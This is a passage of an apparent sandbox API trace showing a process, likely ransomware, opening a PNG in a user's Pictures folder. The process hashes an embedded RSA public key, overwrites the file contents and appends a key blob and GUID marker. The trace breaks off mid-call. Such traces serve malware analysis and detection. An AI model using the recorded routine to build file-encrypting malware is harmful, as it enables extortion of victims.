lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b690690, ftCreationTime.dwHighDateTime=0x1d5de52, ftLastAccessTime.dwLowDateTime=0xee5ad8f0, ftLastAccessTime.dwHighDateTime=0x1d5d842, ftLastWriteTime.dwLowDateTime=0xee5ad8f0, ftLastWriteTime.dwHighDateTime=0x1d5d842, nFileSizeHigh=0x0, nFileSizeLow=0x133c5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5aUm.png", cAlternateFileName="")) returned 1 [0236.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185d80 [0236.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x106) returned 0x31f6b30 [0236.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185d80 | out: hHeap=0x630000) returned 1 [0236.435] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\5aUm.png") returned=".png" [0236.435] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\5aUm.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\fzgfdyb6\\5aum.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.436] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=78789) returned 1 [0236.436] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.439] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1339f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.439] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.441] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.441] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x133c5, lpOverlapped=0x0) returned 1 [0236.442] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.442] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.442] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.443] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.444] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.444] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.444] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.444] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.444] GetLastError () returned 0x0 [0236.444] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.444] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.444] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.444] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.444] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.444] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.444] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x133d0) returned 0x37cf820 [0236.445] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0236.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0236.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0236.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37ceb50 [0236.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc720 [0236.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37ceb98 [0236.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc738 [0236.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc768 [0236.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7c8 [0236.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc780 [0236.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0236.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0236.446] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc768 | out: hHeap=0x630000) returned 1 [0236.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc780 | out: hHeap=0x630000) returned 1 [0236.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7c8 | out: hHeap=0x630000) returned 1 [0236.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7c8 [0236.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0236.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc780 [0236.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0236.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc768 [0236.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6c48 [0236.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0236.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc780 | out: hHeap=0x630000) returned 1 [0236.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc768 | out: hHeap=0x630000) returned 1 [0236.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7c8 | out: hHeap=0x630000) returned 1 [0236.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0236.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.447] GetCurrentThreadId () returned 0x314 [0236.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c5ac0 [0236.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0236.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0236.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.448] GetCurrentThreadId () returned 0x314 [0236.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0236.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0236.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0236.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0236.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7c8 [0236.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0236.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0236.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0236.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0236.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0236.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc768 [0236.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0236.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0236.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0236.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0236.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc780 [0236.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0236.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0236.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc750 [0236.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0236.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7e0 [0236.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0236.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0236.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7b0 [0236.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc798 [0236.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc7f8 [0236.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc798 | out: hHeap=0x630000) returned 1 [0236.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc798 [0236.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7b0 | out: hHeap=0x630000) returned 1 [0236.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0236.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0236.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0236.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc768 | out: hHeap=0x630000) returned 1 [0236.450] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc768 [0236.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.451] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0236.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7c8 | out: hHeap=0x630000) returned 1 [0236.451] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0236.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7f8 | out: hHeap=0x630000) returned 1 [0236.451] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0236.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0236.451] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0236.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0236.451] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0236.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc768 | out: hHeap=0x630000) returned 1 [0236.451] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0236.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0236.451] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0236.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.451] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0236.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0236.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0236.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0236.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d88 | out: hHeap=0x630000) returned 1 [0236.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0236.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0236.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc798 | out: hHeap=0x630000) returned 1 [0236.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0236.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7e0 | out: hHeap=0x630000) returned 1 [0236.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc780 | out: hHeap=0x630000) returned 1 [0236.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc750 | out: hHeap=0x630000) returned 1 [0236.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0236.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0236.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0236.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc738 | out: hHeap=0x630000) returned 1 [0236.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ceb98 | out: hHeap=0x630000) returned 1 [0236.452] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0236.453] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0236.453] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0236.453] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0236.453] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0236.453] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.453] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0236.453] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0236.453] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.453] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.453] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.453] WriteFile (in: hFile=0x640, lpBuffer=0x37cf820*, nNumberOfBytesToWrite=0x133c0, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37cf820*, lpNumberOfBytesWritten=0x3adfb14*=0x133c0, lpOverlapped=0x0) returned 1 [0236.454] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf820 | out: hHeap=0x630000) returned 1 [0236.454] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x133c5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.454] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.454] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.454] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0236.454] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0236.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0236.454] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0236.454] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.454] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0236.454] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0236.454] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.454] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.454] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, 